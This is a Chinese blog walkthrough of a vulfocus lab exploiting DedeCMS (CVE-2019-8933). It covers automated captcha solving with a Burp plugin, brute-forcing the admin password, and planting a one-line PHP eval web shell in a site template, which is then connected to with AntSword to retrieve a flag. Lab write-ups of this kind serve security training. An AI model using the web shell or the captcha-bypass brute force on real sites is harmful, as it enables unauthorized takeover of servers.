DedeCMS(CVE-2019-8933)

本文详细描述了如何利用CVE-2019-8933漏洞对DedeCMS进行文件上传并破解验证码,包括使用Bp插件爆破密码和验证码,最终实现对后台的控制并找到安全漏洞。
摘要由CSDN通过智能技术生成

文件上传漏洞(CVE-2019-8933)

在vulfocus中的镜像管理中搜索并且下载,下载后开启环境

访问80端口的地址

在这里插入图片描述

这里需要掌握DedeCMS默认的后台登录地址就是dede

在url后添加dede目录进行访问

在这里插入图片描述

查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以

在这里插入图片描述

在这里插入图片描述

然后刷新网页进行抓包


此时还需要安装一下用于爆破验证码的Bp插件captcha-killer-modified和开启本地服务识别验证码的脚本

https://github.com/f0ng/captcha-killer-modified/releases/tag/0.24.4

在这里插入图片描述

将插件添加到Bp

在这里插入图片描述

加载了即可

在这里插入图片描述

然后就可以在设置栏里看到


抓包验证码的网页后,右键发送到插件captcha-killer-modified

在这里插入图片描述

获取url的验证码,记得选上使用该插件

在这里插入图片描述

接下来就是开启本地服务识别验证码(感谢大佬提供的开源代码)

在这里插入图片描述

然后接口url就是开启服务机子的IP+8888端口

返回Bp插件界面,然后右键导入模板,填入接口url

在这里插入图片描述

就可以实现识别验证码

在这里插入图片描述

用户名猜测会有admin、root、test这些,此时只需要爆破密码和验证码

抓包

在这里插入图片描述

ctrl+i发送到响应处,选择攻击类型Pitchfork,添加要爆破的位置

在这里插入图片描述

选择payload

payload1的位置,添加常用的密码字典进行爆破

在这里插入图片描述

payload2位置,选择的是验证码的插件

在这里插入图片描述

开始攻击

密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录

所以,我们要设置请求数和时间,比较慢就可以

在这里插入图片描述

然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的

在这里插入图片描述

爆破出密码是admin

成功登录后台

在这里插入图片描述

查找可利用的漏洞

这里可以进行文件上传

在这里插入图片描述

但是又找到了一处

在这里插入图片描述

在这里插入图片描述

此处就可能可以直接输入一句话了

<?php @eval($_POST['cmd']);?>

在这里插入图片描述

保存模板

替换网站主页

在这里插入图片描述

在这里插入图片描述

点击浏览,是可以被成功解析的,使用蚁剑进行连接

在这里插入图片描述

连接成功,接着就是找flag的时间了

在这里插入图片描述

flag-{bmha9e4a143-1a50-4b7c-9119-48e810a832f4}

  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值